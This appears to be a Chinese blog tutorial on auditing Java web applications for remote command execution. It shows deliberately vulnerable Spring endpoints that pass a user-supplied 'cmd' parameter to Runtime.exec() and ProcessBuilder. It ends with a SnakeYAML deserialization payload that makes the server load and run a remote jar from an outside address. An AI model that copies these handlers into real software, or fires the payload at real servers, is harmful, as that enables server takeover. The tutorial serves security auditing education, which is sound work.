java审计-RCE审计

RCE 的中文名称是远程命令执行，指的是攻击者通过Web 端或客户端提交执行命令，由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞，导致在没有指定绝对路径的情况下就可以执行命令。RCE 漏洞的原理其实也很简单，就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤，导致客户端可以提交恶意构造语句，并交由服务器端执行。

zgcadmin

564人浏览 · 2023-04-13 16:56:11

zgcadmin · 2023-04-13 16:56:11 发布

RCE 漏洞的定义及原理

RCE 的中文名称是远程命令执行，指的是攻击者通过Web 端或客户端提交执行命令，由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞，导致在没有指定绝对路径的情况下就可以执行命令。
RCE 漏洞的原理其实也很简单，就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤，导致客户端可以提交恶意构造语句，并交由服务器端执行。常见的可执行函数如：Runtime.exec()，当然我们审计的时候，决不能只根据这个函数来，其他的审计点如：Process、ProcessBuilder.start()等也是很重要的内容。

Runtime

@GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
    Runtime run = Runtime.getRuntime();
    StringBuilder sb = new StringBuilder();

    try {
        Process p = run.exec(cmd);
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String tmpStr;

        while ((tmpStr = inBr.readLine()) != null) {
            sb.append(tmpStr);
        }

        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
                return "Command exec failed!!";
        }

        inBr.close();
        in.close();
    } catch (Exception e) {
        return e.toString();
    }
    return sb.toString();
}

在这里插入图片描述

ProcessBuilder

ProcessBuilder传入参数为列表，第一个参数为可执行命令程序，后面的参数为执行的命令程序的参数。

 @GetMapping("/ProcessBuilder")
 public String processBuilder(String cmd) {

     StringBuilder sb = new StringBuilder();

     try {
        // String[] arrCmd = {"/bin/sh", "-c", cmd};  //linux
         String[] arrCmd = {cmd};                 //windows,windos下无需指定
         ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
         Process p = processBuilder.start();
         BufferedInputStream in = new BufferedInputStream(p.getInputStream());
         BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
         String tmpStr;

         while ((tmpStr = inBr.readLine()) != null) {
             sb.append(tmpStr);
         }
     } catch (Exception e) {
         return e.toString();
     }

     return sb.toString();
 }

在这里插入图片描述

jscmd

传入的参数为一个JavaScript代码的url地址

yml

YAML(YAML Ain’t Markup Language)，也可以叫做YML，是一种人性化的数据序列化的语言，类似于XML，JSON。SpringBoot的配置文件就支持yaml文件
利用SnakeYAML存在的反序列化漏洞来rce，在解析恶意 yml 内容时会完成指定的动作。
https://github.com/artsploit/yaml-payload

http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.0.2.132/yaml-payload.jar"]
  ]]
]